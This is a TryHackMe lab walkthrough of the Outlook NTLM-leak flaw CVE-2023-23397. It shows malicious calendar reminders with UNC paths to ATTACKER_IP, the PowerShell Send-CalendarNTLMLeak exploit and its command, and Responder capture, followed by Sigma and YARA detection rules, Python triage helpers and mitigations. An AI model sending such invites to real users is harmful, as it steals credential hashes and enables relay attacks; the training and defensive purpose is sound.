Outlook NTLM Leak | Tryhackme Writeup/Walkthrough | By Md Amiruddin

Md Amiruddin · Published in InfoSec Write-ups · 15 min read · Mar 25, 2023


Leak password hashes from a user by sending them an email, abusing CVE-2023-23397.

Room link: https://tryhackme.com/room/outlookntlmleak

Task 1: Introduction

On Tuesday, March 14th, Microsoft released 83 security fixes on Patch Tuesday, including CVE-2023-23397. This critical vulnerability impacts all versions of the Outlook desktop app on any Windows system. Outlook web app (OWA) and Microsoft 365 aren’t vulnerable since they do not support NTLM authentication.

Unlike most exploits, this one is particularly dangerous because it is a zero-click exploit, meaning no user interaction is required to trigger it. Once an infected email arrives in the user’s inbox, the attacker can obtain sensitive Net-NTLMv2 credential hashes. Once malicious actors have those hashes, they can get a user’s credentials, authenticate to their system and escalate privileges.

Starting the VM

To deploy the attached VM, press the green Start Machine button at the top of the task. The machine should launch in a split-screen view. If it doesn't, you can press the blue Show Split View button near the top-right of this page. All of the room can be done in split view, but if you prefer connecting to the machine via RDP, you can use the following credentials:

Username : Administrator

Password: Password321

Your VM has a trial version of Outlook installed, so feel free to ignore any activation messages. When opening Outlook, you can also close the “Sign in to set up Office” screen without a problem to continue:

You will also need to use the AttackBox, so this is a good moment to hit the Start AttackBox button at the top of the room.

Task 2: Abusing Appointment Alerts

Outlook Appointment Alerts

On Outlook, it’s possible to add reminder notifications when sending calendar invitations:

You can specify the audio file played when a user gets a notification reminder for a calendar meeting or event. Typically, this would be used for a user to set up their own notifications by pointing to an audio file:

Manipulating this parameter can enable a threat actor to force Outlook to leak the current password hashes to an attacker with zero interaction required.

Abusing Reminder Sounds via UNC Paths

To exploit this vulnerability, an attacker must create a malicious calendar invitation that includes a reference to a sound file located on a network share on the attacker’s machine. At a low level, an Outlook email stores the reference to the sound file in an internal parameter called PidLidReminderFileParameter. To ensure that the audio we embed in our malicious email takes precedence over the victim’s default reminder configuration, we will also need to set another parameter called PidLidReminderOverride to true.

To set up the PidLidReminderFileParameter property to point to a network share, the attacker can specify a Universal Naming Convention (UNC) path instead of a local file. UNC is used in Windows operating systems to find network resources (files, printers, shared documents). These paths consist of a double backslash, the IP address or name of the computer hosting the resource, the share name and the file name. For example:

\\ATTACKER_IP\foo\bar.wav

When the victim receives the malicious email, the UNC path directs them to that SMB share, triggering the vulnerability. This causes the system to start an NTLM authentication process against the attacker’s machine, leaking a Net-NTLMv2 hash that the attacker can later try to crack.

If for some reason SMB isn’t a viable option, non-server versions of Windows will also accept UNC paths that specify port 80 or 443, and will use HTTP to retrieve the file from a WebDAV-enabled web server. The syntax of such a UNC path is as follows:

\\ATTACKER_IP@80\foo\bar.wav

\\ATTACKER_IP@443\foo\bar.wav

This may be useful to bypass firewall restrictions preventing outgoing connections to port 445 (SMB).

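As an added example (not part of the room or of the original exploit), the following Python helper classifies a reminder sound path the way an analyst triaging a PidLidReminderFileParameter value would: it separates local files from UNC paths, recognises the @port WebDAV form described above, and flags hosts outside the internal ranges. The internal address ranges and the .local/.loc intranet suffixes are assumptions to adjust for your own network.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import Optional

# \\host\share\file or \\host@port\share\file (the WebDAV form described above)
UNC_RE = re.compile(r"^\\\\(?P<host>[^\\@]+)(?:@(?P<port>\d{1,5}))?(?:\\(?P<rest>.*))?$")
# Internal ranges: RFC 1918, loopback and link-local (an assumption; adjust to your network)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
INTERNAL_SUFFIXES = (".local", ".loc")   # hypothetical intranet DNS suffixes


@dataclass
class ReminderPath:
    raw: str
    kind: str                    # "local", "smb" or "webdav"
    host: Optional[str] = None
    port: Optional[int] = None
    external: bool = False       # True when the host is outside the internal ranges/suffixes


def host_is_external(host: str) -> bool:
    """Decide whether a UNC host is outside the organisation."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # DNS name: a bare NetBIOS name or an intranet suffix is treated as internal
        return "." in host and not host.lower().endswith(INTERNAL_SUFFIXES)
    return not any(ip in net for net in INTERNAL_NETS)


def classify_reminder_path(value: str) -> ReminderPath:
    """Classify a ReminderSoundFile / PidLidReminderFileParameter value."""
    m = UNC_RE.match(value.strip())
    if not m:
        return ReminderPath(raw=value, kind="local")
    host = m.group("host")
    port = int(m.group("port")) if m.group("port") else None
    # Without @port the redirector uses SMB on TCP 445; with @80 or @443 the
    # WebClient service fetches the file over HTTP(S)/WebDAV instead.
    kind = "webdav" if port is not None else "smb"
    return ReminderPath(value, kind, host, port, host_is_external(host))


def needs_investigation(value: str) -> bool:
    """A reminder sound fetched over the network from an external host is the leak condition."""
    p = classify_reminder_path(value)
    return p.kind != "local" and p.external


if __name__ == "__main__":
    # Constructed sample values; 203.0.113.5 is a documentation address standing in for an attacker host.
    for v in (r"C:\Windows\Media\Reminder.wav", r"\\fileserver01\sounds\ding.wav",
              r"\\203.0.113.5\foo\bar.wav", r"\\203.0.113.5@443\foo\bar.wav"):
        print(f"{v:40} {classify_reminder_path(v)}")
```
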
Answer the questions below:

1. Click and continue learning!
A. No answer needed

Task 3: Crafting a Malicious Appointment

Now that we understand how the vulnerability works let’s craft a malicious email containing an appointment with the required parameters to trigger it.

Setting up Responder

Since we expect the victim to trigger an authentication attempt against the attacker on port 445, we will set up Responder to handle the authentication process and capture the NetNTLM hash for us. If you are unfamiliar with Responder, it simply emulates an SMB server and captures any authentication attempt made against it.

To launch Responder to listen for authentication attempts in your ens5 interface, you can simply run the following command in your AttackBox:

root@attackbox$ responder -I ens5

We are now ready to trigger an authentication attempt via the Outlook vulnerability.

Attempting to Handcraft a Malicious Appointment

As a first attempt, we could manually create an appointment and edit the path to the reminder’s sound file to point to a shared folder. To create an appointment, you will first need to click on the calendar and then on the New Appointment button on the taskbar, as shown in the image below:

We will create an appointment that includes a reminder set in 0 minutes so that it triggers right after the victim receives it. We will also click on the Sound option to configure the reminder’s sound file:

We can try setting the sound file path to a UNC path that points to our AttackBox and click the OK button like this:

However, Outlook will silently ignore the UNC path and revert to using the default WAV file, which can be confirmed by going back to the Sound dialogue:

Since Outlook isn’t expecting users to enter a UNC path here, it probably discards our attempt as invalid input. But not all hope is lost!

OutlookSpy to the Rescue

Even if Outlook cannot set the reminder’s sound file to a UNC path, we can use the OutlookSpy plugin to achieve this. The plugin is already installed in your target machine for your convenience, and it will allow you to access all of Outlook’s internal parameters directly, including the reminder’s sound file.

To view our current appointment from OutlookSpy, click the OutlookSpy tab and then the CurrentItem button in the taskbar:

Note: Be sure to click the CurrentItem button from within the appointment, or you might modify different Outlook components.

From this window, you can see the parameters associated with the appointment’s reminder. We want to set the ReminderSoundFile parameter to the UNC path that points to our AttackBox and set both the ReminderOverrideDefault and ReminderPlaySound to true. Just for reference, here's what each parameter does:

  • ReminderPlaySound: boolean value that indicates if a sound will be played with the reminder.
  • ReminderOverrideDefault: boolean value that indicates the receiving Outlook client to play the sound pointed by ReminderSoundFile, instead of the default one.
  • ReminderSoundFile: string with the path to the sound file to be used. For our exploit, this will point to a bogus shared folder in our AttackBox.

We can use the script tab and the following script to change the parameters to the required values:

Be sure to click the Run button for the changes to be applied. You can go back to the Properties tab to check that the values were correctly changed. Finally, save your appointment to add it to your calendar, making sure the reminder is set to 0 minutes and that the appointment matches the current time and date, as we want it to trigger immediately:

If all went as expected, you should immediately see a reminder popping up:

And you should receive the authentication attempt in your Responder console on your AttackBox:

Answer the questions below:

1. Click and continue learning!
A. No answer needed

Task 4: Weaponizing the Vulnerability

Summarising the steps required to exploit the vulnerability, an attacker would need to:

  1. Create a malicious meeting/appointment with a custom reminder sound pointing to a UNC path on the attacker’s machine.
  2. Send the invite to the victim via email.
  3. Wait for the reminder to trigger a connection against the attacker’s machine.
  4. Capture the Net-NTLMv2 hash, use authentication relaying, or profit in any other way.

Steps 3 and 4 are already covered for us by Responder, but handcrafting the malicious appointment is a bit tedious. Luckily, a couple of exploits are readily available for us to create and send a malicious appointment.

In this task, we will look at the exploit published by Oddvar Moe, which is probably the easiest to understand and use. This PowerShell exploit leverages Outlook’s COM objects to build emails and appointments easily. It contains a couple of functions that we can use:

  • Save-CalendarNTLMLeak: This function creates a malicious appointment and saves it to your own calendar. Useful for testing purposes.
  • Send-CalendarNTLMLeak: This function creates a malicious appointment and sends it via email to a victim. The email invitation will be sent from your Outlook’s current default account.

Dissecting the Exploit’s Code

Both will create an appointment similarly, so we’ll explain the Save-CalendarNTLMLeak only.

First, we will instantiate an “Outlook.Application” object and create an appointment.

$Outlook = New-Object -comObject Outlook.Application
$newcal = $outlook.CreateItem('olAppointmentItem')

The usual parameters of an appointment will be set. These include the recipients, meeting subject, location, body and start and end dates. The exploit sets the start day to the current time so that the reminder is triggered immediately:

$newcal.Recipients.add($recipient)
$newcal.MeetingStatus = [Microsoft.Office.Interop.Outlook.OlMeetingStatus]::olMeeting
$newcal.Subject = $meetingsubject
$newcal.Location = "Virtual"
$newcal.Body = $meetingbody
$newcal.Start = get-date
$newcal.End = (get-date).AddHours(2)

The following additional parameters will be configured to point the reminder’s sound file to the attacker’s server, as previously explained:

$newcal.ReminderSoundFile = $remotefilepath
$newcal.ReminderOverrideDefault = 1
$newcal.ReminderSet = 1
$newcal.ReminderPlaysound = 1

Finally, the appointment will be sent to the recipient via email:

$newcal.send()

Using the Exploit

You can import the exploit’s functions with the Import-Module cmdlet. After that, both functions will be available in your current PowerShell session. To send an email with a malicious appointment, you can just run the following command:

Powershell

PS C:\> cd C:\Users\Administrator\Desktop\
PS C:\Users\Administrator\Desktop\> Import-Module .\CVE-2023-23397.ps1
PS C:\Users\Administrator\Desktop\> Send-CalendarNTLMLeak -recipient "test@thm.loc" -remotefilepath "\\ATTACKER_IP\foo\bar.wav" -meetingsubject "THM Meeting" -meetingbody "This is just a regular meeting invitation :)"

Be sure to replace ATTACKER_IP with the IP address of your AttackBox in the -remotefilepath parameter. Notice that you are using the exploit to send yourself an email in this case, as we have a single account in the machine, but normally you would target other email addresses.

Since the exploit makes use of the current Outlook instance to send the email, you will likely get a couple of alerts asking you to grant permission to the script to send emails on your behalf. Make sure to press Allow as many times as needed. Marking the “Allow access for 10 minutes” checkbox should also help speed this process up:

Answer the questions below:

1. Click and continue learning!
A. No answer needed

Task 5: Detection/Mitigation

Now that we have gone through the steps to weaponize the CVE-2023-23397 attack on Outlook, let's talk about a few ways to detect this attack within the network. Each attack leaves patterns or artifacts that can help the detection team identify the threat. It all depends on the network visibility and on the log sources that are being collected to provide that visibility.

Here, we will discuss a few ways to detect this attack on the host.

Sigma Rules

The following Sigma rule detects Outlook initiating a connection to a WebDav or SMB share, indicating a post-exploitation phase.

title: CVE-2023-23397 Exploitation Attempt
id: 73c59189-6a6d-4b9f-a748-8f6f9bbed75c
status: experimental
description: Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.
author: Robert Lee @quantum_cookie
date: 2023/03/16
references:
    - https://www.trustedsec.com/blog/critical-outlook-vulnerability-in-depth-technical-analysis-and-recommendations-cve-2023-23397/
tags:
    - attack.credential_access
    - attack.initial_access
    - cve.2023.23397
logsource:
    service: security
    product: windows
    definition: 'Requirements: SACLs must be enabled for "Query Value" on the registry keys used in this rule'
detection:
    selection:
        EventID:
            - 4656
            - 4663
        ProcessName|endswith: \OUTLOOK.EXE
        Accesses|contains: Query key value
        ObjectName|contains|all:
            - \REGISTRY\MACHINE\SYSTEM
            - Services\
        ObjectName|endswith:
            - WebClient\NetworkProvider
            - LanmanWorkstation\NetworkProvider
    condition: selection
falsepositives:
    - Searchprotocolhost.exe likes to query these registry keys. To avoid false positives, it's better to filter out those events before they reach the SIEM
level: critical

This Sigma rule detects svchost.exe spawning rundll32.exe with command-line arguments like C:\windows\system32\davclnt.dll,DavSetCookie, which indicates a post-exploitation/exfiltration phase.

title: Suspicious WebDav Client Execution
id: 982e9f2d-1a85-4d5b-aea4-31f5e97c6555
status: experimental
description: 'Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397'
references:
    - https://twitter.com/aceresponder/status/1636116096506818562
    - https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/
    - https://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/
author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
date: 2023/03/16
tags:
    - attack.exfiltration
    - attack.t1048.003
    - cve.2023.23397
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: \svchost.exe
        Image|endswith: \rundll32.exe
        CommandLine|contains: C:\windows\system32\davclnt.dll,DavSetCookie
        CommandLine|re: ://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}
    filter_local_ips:
        CommandLine|contains:
            - ://10.
            - ://192.168.
            - ://172.16.
            - ://172.17.
            - ://172.18.
            - ://172.19.
            - ://172.20.
            - ://172.21.
            - ://172.22.
            - ://172.23.
            - ://172.24.
            - ://172.25.
            - ://172.26.
            - ://172.27.
            - ://172.28.
            - ://172.29.
            - ://172.30.
            - ://172.31.
            - ://127.
            - ://169.254.
    condition: selection and not 1 of filter_*
falsepositives:
    - Unknown
level: high

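The logic of both Sigma rules, re-implemented in Python as an added example (not from the room or the rule authors) and run over a few constructed events. Field names follow the rules' logsources; the sample command lines and registry object paths are constructed, not captured from a real host.

```python
import re
from typing import Dict, List

Event = Dict[str, str]

# Prefix list copied from filter_local_ips in the second rule.
LOCAL_URL_PREFIXES = tuple(["://10.", "://192.168.", "://127.", "://169.254."]
                           + [f"://172.{n}." for n in range(16, 32)])
DAVSETCOOKIE = r"c:\windows\system32\davclnt.dll,davsetcookie"
URL_IP = re.compile(r"://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}")
PROVIDER_KEYS = ("webclient\\networkprovider", "lanmanworkstation\\networkprovider")


def outlook_queries_network_provider(ev: Event) -> bool:
    """First rule: OUTLOOK.EXE reading the WebClient/LanmanWorkstation NetworkProvider keys.
    Sigma string matching is case-insensitive, so everything is lower-cased first."""
    obj = ev.get("ObjectName", "").lower()
    return (ev.get("EventID") in ("4656", "4663")
            and ev.get("ProcessName", "").lower().endswith("\\outlook.exe")
            and "query key value" in ev.get("Accesses", "").lower()
            and "\\registry\\machine\\system" in obj and "services\\" in obj
            and obj.endswith(PROVIDER_KEYS))


def suspicious_webdav_client(ev: Event) -> bool:
    """Second rule: svchost.exe -> rundll32.exe DavSetCookie with a URL to a non-local IPv4."""
    cmd = ev.get("CommandLine", "").lower()
    if not (ev.get("ParentImage", "").lower().endswith("\\svchost.exe")
            and ev.get("Image", "").lower().endswith("\\rundll32.exe")
            and DAVSETCOOKIE in cmd and URL_IP.search(cmd)):
        return False
    # "condition: selection and not 1 of filter_*"
    return not any(p in cmd for p in LOCAL_URL_PREFIXES)


def triage(events: List[Event]) -> List[str]:
    """Return the title of each rule that fires, in event order."""
    hits = []
    for ev in events:
        if outlook_queries_network_provider(ev):
            hits.append("CVE-2023-23397 Exploitation Attempt")
        if suspicious_webdav_client(ev):
            hits.append("Suspicious WebDav Client Execution")
    return hits


# Constructed sample events (field names follow the Sigma logsources above).
SAMPLE_EVENTS: List[Event] = [
    {"EventID": "4663", "ProcessName": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "Accesses": "Query key value",
     "ObjectName": r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WebClient\NetworkProvider"},
    {"EventID": "4663", "ProcessName": r"C:\Windows\System32\SearchProtocolHost.exe",  # documented FP
     "Accesses": "Query key value",
     "ObjectName": r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WebClient\NetworkProvider"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\windows\system32\davclnt.dll,DavSetCookie 203.0.113.5 http://203.0.113.5/foo/bar.wav"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\windows\system32\davclnt.dll,DavSetCookie 10.0.0.5 http://10.0.0.5/share/doc.docx"},
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```
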
These Sigma rules can be converted into queries for your detection and monitoring tool to hunt for suspicious log activity within the network. To learn more about Sigma rules, check this introductory room on Sigma.

Yara Rule

A YARA rule looks for patterns within files on disk. The following three community YARA rules can be used to detect a suspicious MSG file on disk carrying the two properties discussed in the tasks above.

rule SUSP_EXPL_Msg_CVE_2023_23397_Mar23 {
    meta:
        description = "MSG file with a PidLidReminderFileParameter property, potentially exploiting CVE-2023-23397"
        author = "delivr.to, modified by Florian Roth, Nils Kuhnert, Arnim Rupp, marcin@ulikowski.pl"
        date = "2023-03-15"
        modified = "2023-03-17"
        score = 60
        reference = "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/"
        hash = "47fee24586cd2858cfff2dd7a4e76dc95eb44c8506791ccc2d59c837786eafe3"
        hash = "582442ee950d546744f2fa078adb005853a453e9c7f48c6c770e6322a888c2cf"
        hash = "6c0087a5cbccb3c776a471774d1df10fe46b0f0eb11db6a32774eb716e1b7909"
        hash = "7fb7a2394e03cc4a9186237428a87b16f6bf1b66f2724aea1ec6a56904e5bfad"
        hash = "eedae202980c05697a21a5c995d43e1905c4b25f8ca2fff0c34036bc4fd321fa"
    strings:
        /* https://interoperability.blob.core.windows.net/files/MS-OXPROPS/%5bMS-OXPROPS%5d.pdf */
        /* PSETID_Appointment */
        $psetid_app = { 02 20 06 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
        /* PSETID_Meeting */
        $psetid_meeting = { 90 DA D8 6E 0B 45 1B 10 98 DA 00 AA 00 3F 13 05 }
        /* PSETID Task */
        $psetid_task = { 03 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
        /* PidLidReminderFileParameter */
        $rfp = { 1F 85 00 00 }
        /* \\ UNC path prefix - wide formatted */
        $u1 = { 00 00 5C 00 5C 00 }
        /* not MSI */
        $fp_msi1 = { 84 10 0C 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
    condition:
        uint32be(0) == 0xD0CF11E0
        and uint32be(4) == 0xA1B11AE1
        and 1 of ($psetid*)
        and $rfp
        and $u1
        and not 1 of ($fp*)
}

rule EXPL_SUSP_Outlook_CVE_2023_23397_Exfil_IP_Mar23 {
    meta:
        description = "Detects suspicious .msg file with a PidLidReminderFileParameter property exploiting CVE-2023-23397 (modified delivr.to rule - more specific = less FPs but limited to exfil using IP addresses, not FQDNs)"
        author = "delivr.to, Florian Roth, Nils Kuhnert, Arnim Rupp, marcin@ulikowski.pl"
        date = "2023-03-15"
        modified = "2023-03-18"
        score = 75
        reference = "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/"
        hash = "47fee24586cd2858cfff2dd7a4e76dc95eb44c8506791ccc2d59c837786eafe3"
        hash = "582442ee950d546744f2fa078adb005853a453e9c7f48c6c770e6322a888c2cf"
        hash = "6c0087a5cbccb3c776a471774d1df10fe46b0f0eb11db6a32774eb716e1b7909"
        hash = "7fb7a2394e03cc4a9186237428a87b16f6bf1b66f2724aea1ec6a56904e5bfad"
        hash = "eedae202980c05697a21a5c995d43e1905c4b25f8ca2fff0c34036bc4fd321fa"
        hash = "e7a1391dd53f349094c1235760ed0642519fd87baf740839817d47488b9aef02"
    strings:
        /* https://interoperability.blob.core.windows.net/files/MS-OXPROPS/%5bMS-OXPROPS%5d.pdf */
        /* PSETID_Appointment */
        $psetid_app = { 02 20 06 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
        /* PSETID_Meeting */
        $psetid_meeting = { 90 DA D8 6E 0B 45 1B 10 98 DA 00 AA 00 3F 13 05 }
        /* PSETID Task */
        $psetid_task = { 03 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
        /* PidLidReminderFileParameter */
        $rfp = { 1F 85 00 00 }
        /* \\ + IP UNC path prefix - wide formatted */
        $u1 = { 5C 00 5C 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 3? 00 3? 00|3? 00 3? 00|3? 00) }
        /* \\ + IP UNC path prefix - regular/ascii formatted for Transport Neutral Encapsulation Format */
        $u2 = { 00 5C 5C (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 3? 3?|3? 3?|3?) }
        /* not MSI */
        $fp_msi1 = { 84 10 0C 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
    condition:
        (
            uint16(0) == 0xCFD0 and 1 of ($psetid*)
            or
            uint32be(0) == 0x789F3E22
        )
        and any of ( $u* )
        and $rfp
        and not 1 of ($fp*)
}

rule EXPL_SUSP_Outlook_CVE_2023_23397_SMTP_Mail_Mar23 {
    meta:
        author = "Nils Kuhnert"
        date = "2023-03-17"
        description = "Detects suspicious *.eml files that include TNEF content that possibly exploits CVE-2023-23397. Lower score than EXPL_SUSP_Outlook_CVE_2023_23397_Exfil_IP_Mar23 as we're only looking for UNC prefix."
        score = 60
        reference = "https://twitter.com/wdormann/status/1636491612686622723"
    strings:
        // From:
        $mail1 = { 0A 46 72 6F 6D 3A 20 }
        // To:
        $mail2 = { 0A 54 6F 3A }
        // Received:
        $mail3 = { 0A 52 65 63 65 69 76 65 64 3A }
        // Indicates that attachment is TNEF
        $tnef1 = "Content-Type: application/ms-tnef" ascii
        $tnef2 = "\x78\x9f\x3e\x22" base64
        // Check if it's an IPM.Task
        $ipm = "IPM.Task" base64
        // UNC prefix in TNEF
        $unc = "\x00\x00\x00\x5c\x5c" base64
    condition:
        all of them
}

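An added example (not from the room or the rule authors) that evaluates the byte-level conditions of the two .msg rules above in Python, so you can see exactly which markers each rule keys on and recover the UNC target they flag. The sample blob is a constructed stand-in that carries only those markers; it is not a valid compound file or a real .msg.

```python
import re
from typing import Dict, Optional

# Byte patterns copied from the rules above (MS-OXPROPS property-set GUIDs and the
# PidLidReminderFileParameter LID 0x0000851F, little-endian).
OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")          # compound file (.msg) signature
TNEF_MAGIC = bytes.fromhex("789F3E22")                  # TNEF (winmail.dat) signature
PSETIDS = {
    "PSETID_Appointment": bytes.fromhex("0220060000000000C000000000000046"),
    "PSETID_Meeting": bytes.fromhex("90DAD86E0B451B1098DA00AA003F1305"),
    "PSETID_Task": bytes.fromhex("0320060000000000C000000000000046"),
}
RFP_LID = bytes.fromhex("1F850000")                     # PidLidReminderFileParameter
WIDE_UNC = bytes.fromhex("00005C005C00")                # "\\" as UTF-16LE, null-preceded ($u1)
MSI_GUID = bytes.fromhex("84100C0000000000C000000000000046")  # $fp_msi1 false-positive filter
# "\\d.d.d.d" as UTF-16LE and as ASCII (TNEF); "3?" in the YARA rule is the byte range 0x30-0x3F.
WIDE_IP_UNC = re.compile(
    rb"\\\x00\\\x00" + rb"(?:[\x30-\x3f]\x00){1,3}\.\x00" * 3 + rb"(?:[\x30-\x3f]\x00){1,3}")
ASCII_IP_UNC = re.compile(rb"\x00\\\\" + rb"(?:[\x30-\x3f]{1,3}\.){3}[\x30-\x3f]{1,3}")


def extract_wide_unc(data: bytes) -> Optional[str]:
    """Decode the UTF-16LE string that starts at the first null-preceded "\\" prefix, if any."""
    idx = data.find(WIDE_UNC)
    if idx < 0:
        return None
    chunk = data[idx + 2: idx + 2 + 520]                # MAX_PATH * 2 bytes is plenty
    return chunk.decode("utf-16-le", "ignore").split("\x00")[0]


def scan_msg(data: bytes) -> Dict[str, object]:
    """Evaluate the two .msg rules above against a byte blob and report why they fired."""
    psetids = [name for name, guid in PSETIDS.items() if guid in data]
    has_lid = RFP_LID in data
    is_msi = MSI_GUID in data
    ip_unc = bool(WIDE_IP_UNC.search(data) or ASCII_IP_UNC.search(data))
    # SUSP_EXPL_Msg_...: OLE magic + a PSETID + the LID + any wide UNC prefix, not an MSI
    generic = (data[:8] == OLE_MAGIC and bool(psetids) and has_lid
               and WIDE_UNC in data and not is_msi)
    # EXPL_SUSP_Outlook_..._Exfil_IP_...: (.msg with a PSETID, or TNEF) + UNC to a literal IPv4
    exfil_ip = (((data[:2] == b"\xD0\xCF" and bool(psetids)) or data[:4] == TNEF_MAGIC)
                and ip_unc and has_lid and not is_msi)
    return {
        "SUSP_EXPL_Msg_CVE_2023_23397_Mar23": generic,
        "EXPL_SUSP_Outlook_CVE_2023_23397_Exfil_IP_Mar23": exfil_ip,
        "property_sets": psetids,
        "unc_target": extract_wide_unc(data),
    }


def build_sample(reminder_path: str) -> bytes:
    """Constructed stand-in for a .msg (not a valid compound file): OLE magic,
    the PSETID_Appointment GUID, the LID and the reminder path as UTF-16LE."""
    return (OLE_MAGIC + b"\x00" * 24 + PSETIDS["PSETID_Appointment"] + RFP_LID
            + b"\x00\x00" + reminder_path.encode("utf-16-le") + b"\x00\x00")


if __name__ == "__main__":
    # 203.0.113.5 and files.corp.example are constructed placeholders for an attacker host.
    for path in (r"\\203.0.113.5\foo\bar.wav", r"\\files.corp.example\foo\bar.wav",
                 r"C:\Windows\Media\Reminder.wav"):
        print(path, "->", scan_msg(build_sample(path)))
```
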
YARA is already installed on the machine. The YARA rule file cve-2023-23397.yar and the malicious MSG file appointment.msg can be found on the Desktop. Open the terminal and run the following command to run the rule against the MSG file.

Powershell

PS C:\USers\Administrator\Desktop> yara64 .\cve-2023-23397.yar.txt .\appointment.msg
SUSP_EXPL_Msg_CVE_2023_23397_Mar23 .\appointment.msg
EXPL_SUSP_Outlook_CVE_2023_23397_Exfil_IP_Mar23 .\appointment.msg

To learn more about YARA and its pattern-matching use, check this introductory room on YARA.

Powershell script

Microsoft has released a PowerShell script, CVE-2023-23397.ps1, that checks Exchange messaging items (mail, calendar and tasks) for IOCs related to the CVE-2023-23397 attack. The script can be used to audit and clean the detected items.

Note: This script is not usable in this lab.

Mitigation

This vulnerability is being exploited extensively in the wild. Some of the steps recommended by Microsoft to mitigate and avoid this attack are:

  • Add users to the Protected Users Security Group, which prevents using NTLM as an authentication mechanism.
  • Block TCP 445/SMB outbound from your network to avoid any post-exploitation connection.
  • Use the PowerShell script released by Microsoft to scan the Exchange server and detect any attack attempt.
  • Disable the WebClient service to prevent WebDAV connections.

Answer the questions below:

1. Click and continue learning!
A. No answer needed

Task 6: Conclusions

In this room, we have experimented with how a simple vulnerability could allow an attacker to access authentication material without requiring any interaction from their victim by sending a simple, specially crafted email. NTLM Leaks are nothing new in Windows environments, but having one in such a widespread application as Outlook makes this particularly important.

While we have used the vulnerability to capture and crack the Net-NTLMv2 hash, the fact that we can trigger an authentication attempt on behalf of the victim also enables other types of relay attacks, where cracking the hash is not even needed.

As always, the preferred recommendation to avoid falling victim to such an attack is to keep your Outlook installation up to date, as patches are already available from Microsoft.

Thank you for reading.
